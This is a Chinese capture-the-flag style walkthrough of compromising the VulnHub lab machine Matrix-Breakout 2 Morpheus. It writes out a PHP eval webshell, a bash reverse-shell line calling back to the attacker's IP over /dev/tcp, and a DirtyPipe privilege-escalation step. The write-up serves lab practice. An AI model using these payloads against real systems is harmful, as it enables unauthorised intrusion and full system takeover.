前言
靶机:MATRIX-BREAKOUT: 2 MORPHEUS 下载地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/ 难度:Medium-Hard 攻击机:Kali 2020.4 攻击机IP:192.168.88.129 网络模式:NAT
信息收集
-
确定靶机IP
arp-scan -l -
确定靶机ip为:
192.168.88.130。
扫描开放端口nmap -p- 192.168.88.130开放了端口:22、80、81
80端口是一个网页,没什么可用信息。
81端口是一个登录窗口,有点像Tomcat登录窗口,试了几个常见的弱口令没登进去。
扫描目录
使用Kali自带的dirbuster,目录字典是用的是directory-list-2.3-small.txt,发现了如下目录。
渗透过程
目录一一打开,在graffiti.php页面发现了有个提交窗口。
提交内容会在页面上显示,试了xss,果然可以弹窗。
尝试写入webshell,先试试<?php eval(@$_POST['cmd']); ?>,写进去没回显没法连接。抓包看,发现是写入到一个叫graffiti.txt。
可以通过URLhttp://192.168.88.130/graffiti.txt访问。
那么我们可以尝试写入到可执行文件test.php中。
使用webshell管理工具蚁剑连接,连接成功。
在根目录下发现FLAG.txt。
内容大概意思是有个用户Cypher, 还有张图片/.cypher-neo.png可能有用。
先把图片下载下来。
继续翻文件,果然在home文件下发现了Cypher用户文件夹,但是没有权限。
另一个用户文件夹thrinity可以打开,但是不知道有啥用。
上传反弹shell到test.php,开启监听,再访问test.php,在Kali里获得webshell。<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.88.129/9999 0>&1'");?>
也可以直接使用蚁剑的终端。
使用su、sudo -i提权失败。
再来研究研究图片cypher-neo.png,使用Kali自带工具图片分析工具binwalk,发现图片含有一个zip包。
提取文件后,得到两个文件,一个为空,另一个打开都不知道咋打开,遂弃。
再看看有啥用户,除了home下提示的两个也没别的了。
再看下系统内核版本,发现是5.x,可以使用DirtyPipe漏洞(CVE-2022-0847)进行提权。
下载exp,https://gitcode.net/mirrors/r1is/CVE-2022-0847/-/blob/main/Dirty-Pipe.sh, 在蚁剑中上传。
设置Dirty-Pipe.sh权限后,再执行,直接提权成功。
在根目录下找到第二个flag,至此渗透完毕!
原文地址:https://xz.aliyun.com/t/12583
若有侵权请联系删除
技术交流加下方vx
原文始发于微信公众号(红蓝公鸡队):MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论